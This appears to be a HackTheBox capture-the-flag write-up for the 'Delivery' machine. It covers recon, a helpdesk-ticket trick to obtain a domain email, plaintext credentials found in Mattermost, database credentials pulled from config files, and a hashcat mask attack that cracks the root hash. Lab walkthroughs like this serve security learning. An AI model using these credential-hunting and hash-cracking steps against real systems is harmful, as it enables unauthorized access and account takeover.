Deliver

An easy Linux box from HackTheBox, use a cool ticket trick to get an email on the domain, then create an account on the messaging service with it to see private messages from root and plaintext ssh creds, then dump hashes from the database and crack them for root.

Recon #

Running the usual nmap

georgy@pop-os:~/Documents/htb/delivery$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.222

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c40fa859b01acac0ebc0c19518aee27 (RSA)
|   256 5a0cc03b9b76552e6ec4f4b95d761709 (ECDSA)
|_  256 b79df7489da2f27630fd42d3353a808c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Pretty much just find a webserver, looking at it see a home page with not much on it

Snooping around for links, the “HelpDesk” link on the homepage goes to “helpdesk.deliver.htb” and the “Contact Us” page has a link to “delivery.htb:8065”

Add deliver.htb and helpdesk.delivery.htb to /etc/hosts

On the helpdesk side, find an SSRF in searchsploit when submitting tickets - was proven to be a rabbit hole

On port 8065 find a mattermost instance, one where we can create an account, but get blocked because we need to verify our email through clicking a link that is sent to it - obviously domains like @gmail dont work

Also should note that the “Contact Us” page specifies

Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.

So we need a delivery.htb address

Lets submit a ticket with random info just to try it, and see that on submission we get a email address with the ticket number

In my case my email is 6227474@delivery.htb

Now maybe we can use this email to sign up, and see the verification link in the ticket details?

Exploitation #

Sign up with 6227474@delivery.htb, with a password of Password1! - and go back to view our ticket

And see the verification link!

Using that, get access to the MatterMost instance, and immediately see creds to the mail user

maildeliverer:Youve_G0t_Mail!

As well as a hint for privesc, cracking hashes with variations of PleaseSubscribe!

Can now get a shell using ssh

georgy@pop-os:~/Documents/htb/delivery$ ssh maildeliverer@delivery.htb
maildeliverer@delivery.htb's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct  7 19:08:25 2022 from 10.10.14.13
maildeliverer@Delivery:~$ whoami
maildeliverer

Doing the usual enumeration, find a SQL server running on localhost

maildeliverer@Delivery:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer

...

tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)

...

There should be creds inside a config file for either the osticket or mattermost instance, and see from googling that osticket uses a backend MariaDB server but so does the mattermost server

Google around for where the SQL creds are, and see that they are in a file called “ost_config.php”, and search for it

maildeliverer@Delivery:/var$ find ./ -name *conf*.php 2>/dev/null
./www/osticket/upload/include/ost-sampleconfig.php
./www/osticket/upload/include/client/register.confirm.inc.php
./www/osticket/upload/include/client/register.confirmed.inc.php
./www/osticket/upload/include/class.config.php
./www/osticket/upload/include/staff/templates/confirm.tmpl.php
./www/osticket/upload/include/staff/templates/dynamic-field-config.tmpl.php
./www/osticket/upload/include/ost-config.php
./www/osticket/upload/include/ajax.config.php

Catting it out, find the creds in plaintext

# Mysql Login info
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');

Connecting and looking at the users, see that there is only maildeliverer

maildeliverer@Delivery:/opt$ mysql -h 127.0.0.1 -P 8888 -u ost_user --database=osticket --password=\!H3lpD3sk123!


mysql> select * from ost_staff;

...

|        1 |       1 |       1 | maildeliverer | Delivery  | Person   | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy | NULL    | maildeliverer@delivery.htb |       | NULL      |        |           | NULL | NULL     

...

So move on to mattermost, find it in /opt/, and search it for config files

maildeliverer@Delivery:/opt$ find ./ -name *conf* 2>/dev/null
./mattermost/config
./mattermost/config/config.json

Cat out the json file and find the sql login creds

    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    }

So dump the User table inside of the mattermost database

maildeliverer@Delivery:/opt$ mysql -h 127.0.0.1 -u mmuser --password=Crack_The_MM_Admin_PW
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 125
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> select * from Users;

...dumped...

And see the root user, and their hash

| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 |        0 | root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL     |             | root@delivery.htb       |             1 |          |                    |          |          | system_admin system_user |              1 | {}    | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} |      1609157893370 |                 0 |              0 | en     | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"}  |         0 |           |

root : $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO

Now like the message said, can use hashcat with the “PleaseSubscribe!” prefix, and crack just the end of the password

georgy@pop-os:~/Documents/htb/delivery$ hashcat -m 3200 hash.txt -a 3 -1?l?u?d PleaseSubscribe\!?1?1?1?1 --increment --increment-min 17

...

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Cracked to be root:PleaseSubscribe!21

Now can su to root

maildeliverer@Delivery:/opt$ su root
Password: 
root@Delivery:/opt# whoami
root
root@Delivery:/opt#